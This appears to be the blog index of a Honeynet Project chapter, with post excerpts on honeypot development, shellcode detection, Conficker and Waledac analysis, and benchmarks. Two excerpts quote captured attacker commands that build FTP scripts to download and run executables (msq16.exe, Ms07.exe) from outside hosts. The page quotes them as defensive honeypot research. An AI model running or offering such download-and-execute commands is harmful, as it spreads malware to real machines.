Giraffe Chapter

Welcome to the natural habitat of the Giraffe Honeynet Project, a chapter of the international Honeynet Project. Our main interest lies in developing code for applications in the area of honeynets and malware research. Some of our recent projects are:

We (co-)authored the Know Your Enemy: Tracking Botnets paper, so it might be worth a look.

RE-Google in action - screenshot

RE-Google - or how Grandma started Reverse Engineering

Some people say "Reverse Engineering is an art". Well, this might be true if you consider things like mathematics an art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the RE-Google plugin for IDA Pro, even your granny can start reversing :)

Iteolih: RPC vulnerability implementation party

The Dionaea honeypot got more and more mature during the last weeks. As Markus blogged in Iteolih: Miles and More, the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of it.

The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types as well as most caveats and implementation differences found in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)

Iteolih: Miles and More

We got a new milestone due: 10.08.2009

  • thread-pool works
  • stream recording works
  • shellcode detection using libemu works
  • shellcode emulation using libemu works
  • compiles on Linux & OpenBSD

An exploit taken from a public repository and run against the software is detected and emulated.
To shorten things: basically all required points are hit with the current svn revision.
So, given the time we just saved, some words about how it works.

Iteolih: malicious ftp services

Yesterday, I got an incomplete, but successful, attack on my honeypot. The attacker's remote code execution looked like this:

WinExec("cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
ExitThread(0)

As the part required to download the malware to the remote host was incomplete, I got curious and wanted a copy.

Iteolih: If you can't touch it ...

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.

cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe

Iteolih: SMB/RPC efforts

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).

SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.

Conficker.A going down?

Conficker contains a piece of code that has been the object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it performs a lookup against Maxmind's GeoIP database, which is freely available, and skips the host if the returned country code is UA. While the B variant comes with a copy of the database embedded, the A variant downloads the file from Maxmind's server. A couple of days ago Felix had the idea to deliver a specially crafted database that maps every IP address to the Ukraine.

nebula - Client library and revised signature segment selection

One project mentored by the Honeynet Project during GSoC aims at improving nebula, an automated intrusion signature generator. There are two critical components in the signature generator: a clustering engine that groups similar attacks into classes, and a signature assembler that extracts common features and selects some of them for the actual signature.

Iteolih: Is this worth your time?

Hello,
due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as a unique abbreviation. Things are rolling for the project, writing code has started, and a basic homepage with instructions on how to compile/use it was created.
I even had the plan to write about it once or twice: finish something in the code, write about it. When I was done with the code, I got the idea that writing about it was not worth your time.

Iteolih: Python Benchmark

As the plan is to embed Python as the scripting language in the honeypot, I ran a benchmark on a test suite. The 'test suite' is a C core which accepts connections and allows Python to deal with the input. The protocol used for benchmarking is HTTP; the service serves a non-static HTML page.
I tested

  • 2.6.2 (release26-maint, Apr 19 2009, 02:15:38)
  • 3.0.1+ (r301:69556, Apr 15 2009, 17:22:45)
  • 3.1a1+ (py3k, Mar 30 2009, 02:02:26)

To benchmark, I ran the Apache benchmark tool ab.

A view on Conficker's inside

Many people have asked us what Conficker looks like. That's a tough question for something that's hidden and tries to be as stealthy as possible. The last time somebody asked me "Can you show me Conficker?", I decided to visualize it. Here is a little video that shows the evil core of Conficker.C.

Speaking Waledac

While it seems to be impossible to say whether Waledac is the successor of Storm or not, what we can do is take a look at the traffic encryption. The guys over at Shadowserver have already blogged some details about this. We at the Giraffe Chapter investigated Waledac's communication protocol further. Here are our results.

Giraffe Chapter - Status Report 2008

ORGANIZATION
This year, Felix Leder and Mark Schlösser joined our team. We are focused on active development of honeypot tools and for us writing code is a passion. The Giraffe Chapter now consists of the following people:

  • Paul Bächer
  • Markus Kötter
  • Felix Leder
  • Mark Schlösser
  • Tillmann Werner
  • Georg Wicherski

DEPLOYMENTS

Waledac is wishing merry christmas

There is a new bot in town. It's called Waledac. The way it is spreading reminds a lot of people of the good old Storm botnet: An email is sent containing a "Christmas card" in the form of the executable "postcard.exe".
A preliminary view on the binary has been given by the Shadowserver guys (Steve Adair).

I had the chance to have a first look at the binary (MD5 ccddda141a19d693ad9cb206f2ae0de9) and want to note down a few of my findings to let the hunt begin.

ipv6 local-link scope is a mess

I've been looking at IPv6 lately, and even though I got a global /64 for free from he.net, I'm not that amused about IPv6 yet.

No more emulation!

Emulation is an important technology in honeypots and honeynets. It's not always what we want, though, and here's why. As you might know, most bots perform attacks in multiple stages, i.e., they

  • send some exploit code to the victim that opens a shell,
  • connect to that shell or let the shell connect back,
  • invoke commands to download the actual malware binary,
  • execute the malware.

Catching the exploit and providing a fake shell isn't too hard, as shown in this post. But we certainly don't want the malware to get executed on our honeypot, not even in an emulated environment. Instead, we want to do different things with it, e.g., submit it to a central service for automated analysis.

About The Honeynet Project

Founded in 1999, The Honeynet Project is an international, non-profit (501c3) research organization dedicated to improving the security of the Internet at no cost to the public. With Chapters around the world, our volunteers are firmly committed to the ideals of OpenSource. Our goal, simply put, is to make a difference. We accomplish this goal in the following three ways.
